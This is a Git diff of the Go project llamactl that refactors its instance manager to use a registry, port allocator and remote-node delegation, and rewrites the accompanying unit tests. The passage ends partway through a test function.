t.Fatalf("DeleteInstance failed: %v", err)
}
@@ -120,7 +85,7 @@ func TestPersistence(t *testing.T) {
}
func TestConcurrentAccess(t *testing.T) {
mgr := createTestManager()
mgr := createTestManager(t)
defer mgr.Shutdown()
// Test concurrent operations
@@ -132,10 +97,12 @@ func TestConcurrentAccess(t *testing.T) {
wg.Add(1)
go func(index int) {
defer wg.Done()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
options := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
},
}
instanceName := fmt.Sprintf("concurrent-test-%d", index)
@@ -146,7 +113,7 @@ func TestConcurrentAccess(t *testing.T) {
}
// Concurrent list operations
for i := 0; i < 3; i++ {
for range 3 {
wg.Add(1)
go func() {
defer wg.Done()
@@ -165,47 +132,39 @@ func TestConcurrentAccess(t *testing.T) {
}
}
func TestShutdown(t *testing.T) {
mgr := createTestManager()
// Create test instance
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
// Helper functions for test configuration
func createTestAppConfig(instancesDir string) *config.AppConfig {
// Use 'sh -c "sleep 999999"' as a test command instead of 'llama-server'
// The shell ignores all additional arguments passed after the command
return &config.AppConfig{
Backends: config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "sh",
Args: []string{"-c", "sleep 999999"},
},
MLX: config.BackendSettings{
Command: "sh",
Args: []string{"-c", "sleep 999999"},
},
},
Instances: config.InstancesConfig{
PortRange: [2]int{8000, 9000},
InstancesDir: instancesDir,
LogsDir: instancesDir,
MaxInstances: 10,
MaxRunningInstances: 10,
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
TimeoutCheckInterval: 5,
},
LocalNode: "main",
Nodes: map[string]config.NodeConfig{},
}
_, err := mgr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Shutdown should not panic
mgr.Shutdown()
// Multiple shutdowns should not panic
mgr.Shutdown()
}
// Helper function to create a test manager with standard config
func createTestManager() manager.InstanceManager {
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogsDir: "/tmp/test",
MaxInstances: 10,
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
TimeoutCheckInterval: 5,
}
return manager.NewInstanceManager(backendConfig, cfg)
func createTestManager(t *testing.T) manager.InstanceManager {
tempDir := t.TempDir()
appConfig := createTestAppConfig(tempDir)
return manager.New(appConfig)
}

View File

@@ -1,159 +1,351 @@
package manager
import (
"context"
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/instance"
"llamactl/pkg/validation"
"os"
"path/filepath"
"log"
)
type MaxRunningInstancesError error
// ListInstances returns a list of all instances managed by the instance manager.
func (im *instanceManager) ListInstances() ([]*instance.Process, error) {
im.mu.RLock()
defer im.mu.RUnlock()
instances := make([]*instance.Process, 0, len(im.instances))
for _, inst := range im.instances {
instances = append(instances, inst)
// updateLocalInstanceFromRemote updates the local stub instance with data from the remote instance
func (im *instanceManager) updateLocalInstanceFromRemote(localInst *instance.Instance, remoteInst *instance.Instance) {
if localInst == nil || remoteInst == nil {
return
}
remoteOptions := remoteInst.GetOptions()
if remoteOptions == nil {
return
}
// Update the local instance with all remote data
localInst.SetOptions(remoteOptions)
localInst.SetStatus(remoteInst.GetStatus())
localInst.Created = remoteInst.Created
}
// ListInstances returns a list of all instances managed by the instance manager.
// For remote instances, this fetches the live state from remote nodes and updates local stubs.
func (im *instanceManager) ListInstances() ([]*instance.Instance, error) {
instances := im.registry.list()
// Update remote instances with live state
ctx := context.Background()
for _, inst := range instances {
if node := im.getNodeForInstance(inst); node != nil {
remoteInst, err := im.remote.getInstance(ctx, node, inst.Name)
if err != nil {
// Log error but continue with stale data
// Don't fail the entire list operation due to one remote failure
continue
}
// Update the local stub with all remote data (preserving Nodes)
im.updateLocalInstanceFromRemote(inst, remoteInst)
}
}
return instances, nil
}
// CreateInstance creates a new instance with the given options and returns it.
// The instance is initially in a "stopped" state.
func (im *instanceManager) CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
func (im *instanceManager) CreateInstance(name string, options *instance.Options) (*instance.Instance, error) {
if options == nil {
return nil, fmt.Errorf("instance options cannot be nil")
}
name, err := validation.ValidateInstanceName(name)
err := options.BackendOptions.ValidateInstanceOptions()
if err != nil {
return nil, err
}
err = validation.ValidateInstanceOptions(options)
if err != nil {
return nil, err
}
im.mu.Lock()
defer im.mu.Unlock()
// Check max instances limit after acquiring the lock
if len(im.instances) >= im.instancesConfig.MaxInstances && im.instancesConfig.MaxInstances != -1 {
return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances)
}
// Check if instance with this name already exists
if im.instances[name] != nil {
// Check if instance with this name already exists (must be globally unique)
if _, exists := im.registry.get(name); exists {
return nil, fmt.Errorf("instance with name %s already exists", name)
}
// Assign and validate port for backend-specific options
if err := im.assignAndValidatePort(options); err != nil {
return nil, err
// Check if this is a remote instance (local node not in the Nodes set)
if _, isLocal := options.Nodes[im.globalConfig.LocalNode]; !isLocal && len(options.Nodes) > 0 {
// Get the first node from the set
var nodeName string
for node := range options.Nodes {
nodeName = node
break
}
// Create the remote instance on the remote node
ctx := context.Background()
nodeConfig, exists := im.remote.getNodeForInstance(nodeName)
if !exists {
// Try to set the node if it doesn't exist yet
if err := im.remote.setInstanceNode(name, nodeName); err != nil {
return nil, fmt.Errorf("node %s not found", nodeName)
}
nodeConfig, _ = im.remote.getNodeForInstance(name)
}
remoteInst, err := im.remote.createInstance(ctx, nodeConfig, name, options)
if err != nil {
return nil, err
}
// Create a local stub that preserves the Nodes field for tracking
// We keep the original options (with Nodes) so IsRemote() works correctly
inst := instance.New(name, im.globalConfig, options, nil)
// Update the local stub with all remote data (preserving Nodes)
im.updateLocalInstanceFromRemote(inst, remoteInst)
// Map instance to node
if err := im.remote.setInstanceNode(name, nodeName); err != nil {
return nil, fmt.Errorf("failed to map instance to node: %w", err)
}
// Add to registry (doesn't count towards local limits)
if err := im.registry.add(inst); err != nil {
return nil, fmt.Errorf("failed to add instance to registry: %w", err)
}
// Persist the remote instance locally for tracking across restarts
if err := im.persistInstance(inst); err != nil {
// Rollback: remove from registry
im.registry.remove(name)
return nil, fmt.Errorf("failed to persist remote instance %s: %w", name, err)
}
return inst, nil
}
statusCallback := func(oldStatus, newStatus instance.InstanceStatus) {
// Local instance creation
// Check max instances limit for local instances only
totalInstances := im.registry.count()
remoteCount := 0
for _, inst := range im.registry.list() {
if inst.IsRemote() {
remoteCount++
}
}
localInstanceCount := totalInstances - remoteCount
if localInstanceCount >= im.globalConfig.Instances.MaxInstances && im.globalConfig.Instances.MaxInstances != -1 {
return nil, fmt.Errorf("maximum number of instances (%d) reached", im.globalConfig.Instances.MaxInstances)
}
// Assign and validate port for backend-specific options
currentPort := im.getPortFromOptions(options)
var allocatedPort int
if currentPort == 0 {
// Allocate a port if not specified
allocatedPort, err = im.ports.allocate(name)
if err != nil {
return nil, fmt.Errorf("failed to allocate port: %w", err)
}
im.setPortInOptions(options, allocatedPort)
} else {
// Use the specified port
if err := im.ports.allocateSpecific(currentPort, name); err != nil {
return nil, fmt.Errorf("port %d is already in use: %w", currentPort, err)
}
allocatedPort = currentPort
}
statusCallback := func(oldStatus, newStatus instance.Status) {
im.onStatusChange(name, oldStatus, newStatus)
}
inst := instance.NewInstance(name, &im.backendsConfig, &im.instancesConfig, options, statusCallback)
im.instances[inst.Name] = inst
inst := instance.New(name, im.globalConfig, options, statusCallback)
// Add to registry
if err := im.registry.add(inst); err != nil {
// Rollback: release port
im.ports.release(allocatedPort)
return nil, fmt.Errorf("failed to add instance to registry: %w", err)
}
// Persist instance (best-effort, don't fail if persistence fails)
if err := im.persistInstance(inst); err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
log.Printf("Warning: failed to persist instance %s: %v", name, err)
}
return inst, nil
}
// GetInstance retrieves an instance by its name.
func (im *instanceManager) GetInstance(name string) (*instance.Process, error) {
im.mu.RLock()
defer im.mu.RUnlock()
instance, exists := im.instances[name]
// For remote instances, this fetches the live state from the remote node and updates the local stub.
func (im *instanceManager) GetInstance(name string) (*instance.Instance, error) {
inst, exists := im.registry.get(name)
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
return instance, nil
// Check if instance is remote and fetch live state
if node := im.getNodeForInstance(inst); node != nil {
ctx := context.Background()
remoteInst, err := im.remote.getInstance(ctx, node, name)
if err != nil {
return nil, err
}
// Update the local stub with all remote data (preserving Nodes)
im.updateLocalInstanceFromRemote(inst, remoteInst)
// Return the local stub (preserving Nodes field)
return inst, nil
}
return inst, nil
}
// UpdateInstance updates the options of an existing instance and returns it.
// If the instance is running, it will be restarted to apply the new options.
func (im *instanceManager) UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
func (im *instanceManager) UpdateInstance(name string, options *instance.Options) (*instance.Instance, error) {
inst, exists := im.registry.get(name)
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
// Check if instance is remote and delegate to remote operation
if node := im.getNodeForInstance(inst); node != nil {
ctx := context.Background()
remoteInst, err := im.remote.updateInstance(ctx, node, name, options)
if err != nil {
return nil, err
}
// Update the local stub with all remote data (preserving Nodes)
im.updateLocalInstanceFromRemote(inst, remoteInst)
// Persist the updated remote instance locally
if err := im.persistInstance(inst); err != nil {
return nil, fmt.Errorf("failed to persist updated remote instance %s: %w", name, err)
}
return inst, nil
}
if options == nil {
return nil, fmt.Errorf("instance options cannot be nil")
}
err := validation.ValidateInstanceOptions(options)
err := options.BackendOptions.ValidateInstanceOptions()
if err != nil {
return nil, err
}
// Lock this specific instance only
lock := im.lockInstance(name)
lock.Lock()
defer lock.Unlock()
// Handle port changes
oldPort := inst.GetPort()
newPort := im.getPortFromOptions(options)
var allocatedPort int
if newPort != oldPort {
// Port is changing - need to release old and allocate new
if newPort == 0 {
// Auto-allocate new port
allocatedPort, err = im.ports.allocate(name)
if err != nil {
return nil, fmt.Errorf("failed to allocate new port: %w", err)
}
im.setPortInOptions(options, allocatedPort)
} else {
// Use specified port
if err := im.ports.allocateSpecific(newPort, name); err != nil {
return nil, fmt.Errorf("failed to allocate port %d: %w", newPort, err)
}
allocatedPort = newPort
}
// Release old port
if oldPort > 0 {
if err := im.ports.release(oldPort); err != nil {
// Rollback new port allocation
im.ports.release(allocatedPort)
return nil, fmt.Errorf("failed to release old port %d: %w", oldPort, err)
}
}
}
// Check if instance is running before updating options
wasRunning := instance.IsRunning()
wasRunning := inst.IsRunning()
// If the instance is running, stop it first
if wasRunning {
if err := instance.Stop(); err != nil {
if err := inst.Stop(); err != nil {
return nil, fmt.Errorf("failed to stop instance %s for update: %w", name, err)
}
}
// Now update the options while the instance is stopped
instance.SetOptions(options)
inst.SetOptions(options)
// If it was running before, start it again with the new options
if wasRunning {
if err := instance.Start(); err != nil {
if err := inst.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s after update: %w", name, err)
}
}
im.mu.Lock()
defer im.mu.Unlock()
if err := im.persistInstance(instance); err != nil {
if err := im.persistInstance(inst); err != nil {
return nil, fmt.Errorf("failed to persist updated instance %s: %w", name, err)
}
return instance, nil
return inst, nil
}
// DeleteInstance removes stopped instance by its name.
func (im *instanceManager) DeleteInstance(name string) error {
im.mu.Lock()
defer im.mu.Unlock()
instance, exists := im.instances[name]
inst, exists := im.registry.get(name)
if !exists {
return fmt.Errorf("instance with name %s not found", name)
}
if instance.IsRunning() {
// Check if instance is remote and delegate to remote operation
if node := im.getNodeForInstance(inst); node != nil {
ctx := context.Background()
err := im.remote.deleteInstance(ctx, node, name)
if err != nil {
return err
}
// Clean up local tracking
im.remote.removeInstance(name)
im.registry.remove(name)
// Delete the instance's persistence file
if err := im.persistence.delete(name); err != nil {
return fmt.Errorf("failed to delete config file for remote instance %s: %w", name, err)
}
return nil
}
// Lock this specific instance and clean up the lock on completion
lock := im.lockInstance(name)
lock.Lock()
defer im.unlockAndCleanup(name)
status := inst.GetStatus()
if status == instance.Running || status == instance.Restarting {
return fmt.Errorf("instance with name %s is still running, stop it before deleting", name)
}
delete(im.ports, instance.GetPort())
delete(im.instances, name)
// Release port (use ReleaseByInstance for proper cleanup)
im.ports.releaseByInstance(name)
// Delete the instance's config file if persistence is enabled
instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
if err := os.Remove(instancePath); err != nil && !os.IsNotExist(err) {
return fmt.Errorf("failed to delete config file for instance %s: %w", instance.Name, err)
// Remove from registry
if err := im.registry.remove(name); err != nil {
return fmt.Errorf("failed to remove instance from registry: %w", err)
}
// Delete persistence file
if err := im.persistence.delete(name); err != nil {
return fmt.Errorf("failed to delete config file for instance %s: %w", name, err)
}
return nil
@@ -161,156 +353,186 @@ func (im *instanceManager) DeleteInstance(name string) error {
// StartInstance starts a stopped instance and returns it.
// If the instance is already running, it returns an error.
func (im *instanceManager) StartInstance(name string) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
maxRunningExceeded := len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances && im.instancesConfig.MaxRunningInstances != -1
im.mu.RUnlock()
func (im *instanceManager) StartInstance(name string) (*instance.Instance, error) {
inst, exists := im.registry.get(name)
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if instance.IsRunning() {
return instance, fmt.Errorf("instance with name %s is already running", name)
// Check if instance is remote and delegate to remote operation
if node := im.getNodeForInstance(inst); node != nil {
ctx := context.Background()
remoteInst, err := im.remote.startInstance(ctx, node, name)
if err != nil {
return nil, err
}
// Update the local stub with all remote data (preserving Nodes)
im.updateLocalInstanceFromRemote(inst, remoteInst)
return inst, nil
}
if maxRunningExceeded {
return nil, MaxRunningInstancesError(fmt.Errorf("maximum number of running instances (%d) reached", im.instancesConfig.MaxRunningInstances))
// Lock this specific instance only
lock := im.lockInstance(name)
lock.Lock()
defer lock.Unlock()
// Idempotent: if already running, just return success
if inst.IsRunning() {
return inst, nil
}
if err := instance.Start(); err != nil {
// Check max running instances limit for local instances only
if im.IsMaxRunningInstancesReached() {
return nil, MaxRunningInstancesError(fmt.Errorf("maximum number of running instances (%d) reached", im.globalConfig.Instances.MaxRunningInstances))
}
if err := inst.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
}
im.mu.Lock()
defer im.mu.Unlock()
err := im.persistInstance(instance)
if err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
// Persist instance (best-effort, don't fail if persistence fails)
if err := im.persistInstance(inst); err != nil {
log.Printf("Warning: failed to persist instance %s: %v", name, err)
}
return instance, nil
return inst, nil
}
func (im *instanceManager) IsMaxRunningInstancesReached() bool {
im.mu.RLock()
defer im.mu.RUnlock()
if im.instancesConfig.MaxRunningInstances != -1 && len(im.runningInstances) >= im.instancesConfig.MaxRunningInstances {
return true
if im.globalConfig.Instances.MaxRunningInstances == -1 {
return false
}
return false
// Count only local running instances (each node has its own limits)
localRunningCount := 0
for _, inst := range im.registry.listRunning() {
if !inst.IsRemote() {
localRunningCount++
}
}
return localRunningCount >= im.globalConfig.Instances.MaxRunningInstances
}
// StopInstance stops a running instance and returns it.
func (im *instanceManager) StopInstance(name string) (*instance.Process, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
func (im *instanceManager) StopInstance(name string) (*instance.Instance, error) {
inst, exists := im.registry.get(name)
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if !instance.IsRunning() {
return instance, fmt.Errorf("instance with name %s is already stopped", name)
// Check if instance is remote and delegate to remote operation
if node := im.getNodeForInstance(inst); node != nil {
ctx := context.Background()
remoteInst, err := im.remote.stopInstance(ctx, node, name)
if err != nil {
return nil, err
}
// Update the local stub with all remote data (preserving Nodes)
im.updateLocalInstanceFromRemote(inst, remoteInst)
return inst, nil
}
if err := instance.Stop(); err != nil {
// Lock this specific instance only
lock := im.lockInstance(name)
lock.Lock()
defer lock.Unlock()
// Idempotent: if already stopped, just return success
if !inst.IsRunning() {
return inst, nil
}
if err := inst.Stop(); err != nil {
return nil, fmt.Errorf("failed to stop instance %s: %w", name, err)
}
im.mu.Lock()
defer im.mu.Unlock()
err := im.persistInstance(instance)
if err != nil {
return nil, fmt.Errorf("failed to persist instance %s: %w", name, err)
// Persist instance (best-effort, don't fail if persistence fails)
if err := im.persistInstance(inst); err != nil {
log.Printf("Warning: failed to persist instance %s: %v", name, err)
}
return instance, nil
return inst, nil
}
// RestartInstance stops and then starts an instance, returning the updated instance.
func (im *instanceManager) RestartInstance(name string) (*instance.Process, error) {
instance, err := im.StopInstance(name)
if err != nil {
return nil, err
func (im *instanceManager) RestartInstance(name string) (*instance.Instance, error) {
inst, exists := im.registry.get(name)
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
return im.StartInstance(instance.Name)
// Check if instance is remote and delegate to remote operation
if node := im.getNodeForInstance(inst); node != nil {
ctx := context.Background()
remoteInst, err := im.remote.restartInstance(ctx, node, name)
if err != nil {
return nil, err
}
// Update the local stub with all remote data (preserving Nodes)
im.updateLocalInstanceFromRemote(inst, remoteInst)
return inst, nil
}
// Lock this specific instance for the entire restart operation to ensure atomicity
lock := im.lockInstance(name)
lock.Lock()
defer lock.Unlock()
// Stop the instance
if inst.IsRunning() {
if err := inst.Stop(); err != nil {
return nil, fmt.Errorf("failed to stop instance %s: %w", name, err)
}
}
// Start the instance
if err := inst.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
}
// Persist the restarted instance
if err := im.persistInstance(inst); err != nil {
log.Printf("Warning: failed to persist instance %s: %v", name, err)
}
return inst, nil
}
// GetInstanceLogs retrieves the logs for a specific instance by its name.
func (im *instanceManager) GetInstanceLogs(name string) (string, error) {
im.mu.RLock()
_, exists := im.instances[name]
im.mu.RUnlock()
func (im *instanceManager) GetInstanceLogs(name string, numLines int) (string, error) {
inst, exists := im.registry.get(name)
if !exists {
return "", fmt.Errorf("instance with name %s not found", name)
}
// TODO: Implement actual log retrieval logic
return fmt.Sprintf("Logs for instance %s", name), nil
// Check if instance is remote and delegate to remote operation
if node := im.getNodeForInstance(inst); node != nil {
ctx := context.Background()
return im.remote.getInstanceLogs(ctx, node, name, numLines)
}
// Get logs from the local instance
return inst.GetLogs(numLines)
}
// getPortFromOptions extracts the port from backend-specific options
func (im *instanceManager) getPortFromOptions(options *instance.CreateInstanceOptions) int {
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
if options.LlamaServerOptions != nil {
return options.LlamaServerOptions.Port
}
case backends.BackendTypeMlxLm:
if options.MlxServerOptions != nil {
return options.MlxServerOptions.Port
}
case backends.BackendTypeVllm:
if options.VllmServerOptions != nil {
return options.VllmServerOptions.Port
}
}
return 0
func (im *instanceManager) getPortFromOptions(options *instance.Options) int {
return options.BackendOptions.GetPort()
}
// setPortInOptions sets the port in backend-specific options
func (im *instanceManager) setPortInOptions(options *instance.CreateInstanceOptions, port int) {
switch options.BackendType {
case backends.BackendTypeLlamaCpp:
if options.LlamaServerOptions != nil {
options.LlamaServerOptions.Port = port
}
case backends.BackendTypeMlxLm:
if options.MlxServerOptions != nil {
options.MlxServerOptions.Port = port
}
case backends.BackendTypeVllm:
if options.VllmServerOptions != nil {
options.VllmServerOptions.Port = port
}
}
func (im *instanceManager) setPortInOptions(options *instance.Options, port int) {
options.BackendOptions.SetPort(port)
}
// assignAndValidatePort assigns a port if not specified and validates it's not in use
func (im *instanceManager) assignAndValidatePort(options *instance.CreateInstanceOptions) error {
currentPort := im.getPortFromOptions(options)
if currentPort == 0 {
// Assign a port if not specified
port, err := im.getNextAvailablePort()
if err != nil {
return fmt.Errorf("failed to get next available port: %w", err)
}
im.setPortInOptions(options, port)
// Mark the port as used
im.ports[port] = true
} else {
// Validate the specified port
if _, exists := im.ports[currentPort]; exists {
return fmt.Errorf("port %d is already in use", currentPort)
}
// Mark the port as used
im.ports[currentPort] = true
}
return nil
// EvictLRUInstance finds and stops the least recently used running instance.
func (im *instanceManager) EvictLRUInstance() error {
return im.lifecycle.evictLRU()
}

View File

@@ -2,7 +2,6 @@ package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
@@ -10,40 +9,14 @@ import (
"testing"
)
func TestCreateInstance_Success(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
inst, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", inst.Name)
}
if inst.GetStatus() != instance.Stopped {
t.Error("New instance should not be running")
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
}
}
func TestCreateInstance_ValidationAndLimits(t *testing.T) {
// Test duplicate names
mngr := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
func TestCreateInstance_FailsWithDuplicateName(t *testing.T) {
mngr := createTestManager(t)
options := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
},
}
@@ -60,24 +33,37 @@ func TestCreateInstance_ValidationAndLimits(t *testing.T) {
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
}
// Test max instances limit
backendConfig := config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
func TestCreateInstance_FailsWhenMaxInstancesReached(t *testing.T) {
tempDir := t.TempDir()
appConfig := &config.AppConfig{
Backends: config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
Instances: config.InstancesConfig{
PortRange: [2]int{8000, 9000},
InstancesDir: tempDir,
MaxInstances: 1, // Very low limit for testing
TimeoutCheckInterval: 5,
},
LocalNode: "main",
Nodes: map[string]config.NodeConfig{},
}
limitedManager := manager.New(appConfig)
options := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
},
}
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 1, // Very low limit for testing
TimeoutCheckInterval: 5,
}
limitedManager := manager.NewInstanceManager(backendConfig, cfg)
_, err = limitedManager.CreateInstance("instance1", options)
_, err := limitedManager.CreateInstance("instance1", options)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
@@ -92,33 +78,32 @@ func TestCreateInstance_ValidationAndLimits(t *testing.T) {
}
}
func TestPortManagement(t *testing.T) {
manager := createTestManager()
func TestCreateInstance_FailsWithPortConflict(t *testing.T) {
manager := createTestManager(t)
// Test auto port assignment
options1 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
options1 := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
},
}
inst1, err := manager.CreateInstance("instance1", options1)
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
port1 := inst1.GetPort()
if port1 < 8000 || port1 > 9000 {
t.Errorf("Expected port in range 8000-9000, got %d", port1)
}
// Test port conflict detection
options2 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: port1, // Same port - should conflict
// Try to create instance with same port
options2 := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: 8080, // Same port - should conflict
},
},
}
@@ -129,98 +114,21 @@ func TestPortManagement(t *testing.T) {
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
// Test port release on deletion
specificPort := 8080
options3 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: specificPort,
},
}
_, err = manager.CreateInstance("port-test", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
err = manager.DeleteInstance("port-test")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-port-test", options3)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestInstanceOperations(t *testing.T) {
manager := createTestManager()
func TestInstanceOperations_FailWithNonExistentInstance(t *testing.T) {
manager := createTestManager(t)
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
options := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
},
}
// Create instance
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Get instance
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
// Update instance
newOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().LlamaServerOptions.Model)
}
// List instances
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 1 {
t.Errorf("Expected 1 instance, got %d", len(instances))
}
// Delete instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
// Test operations on non-existent instances
_, err = manager.GetInstance("nonexistent")
_, err := manager.GetInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
@@ -235,3 +143,141 @@ func TestInstanceOperations(t *testing.T) {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
func TestDeleteInstance_RunningInstanceFails(t *testing.T) {
mgr := createTestManager(t)
defer mgr.Shutdown()
options := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
},
}
inst, err := mgr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Simulate starting the instance
inst.SetStatus(instance.Running)
// Should fail to delete running instance
err = mgr.DeleteInstance("test-instance")
if err == nil {
t.Error("Expected error when deleting running instance")
}
}
func TestUpdateInstance(t *testing.T) {
mgr := createTestManager(t)
defer mgr.Shutdown()
options := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
},
}
inst, err := mgr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Start the instance (will use 'yes' command from test config)
if err := inst.Start(); err != nil {
t.Fatalf("Failed to start instance: %v", err)
}
// Update running instance with new model
newOptions := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8080,
},
},
}
updated, err := mgr.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
// Should be running after update (was running before, should be restarted)
if !updated.IsRunning() {
t.Errorf("Instance should be running after update, got: %v", updated.GetStatus())
}
if updated.GetOptions().BackendOptions.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model to be updated")
}
}
func TestUpdateInstance_ReleasesOldPort(t *testing.T) {
mgr := createTestManager(t)
defer mgr.Shutdown()
options := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &backends.LlamaServerOptions{
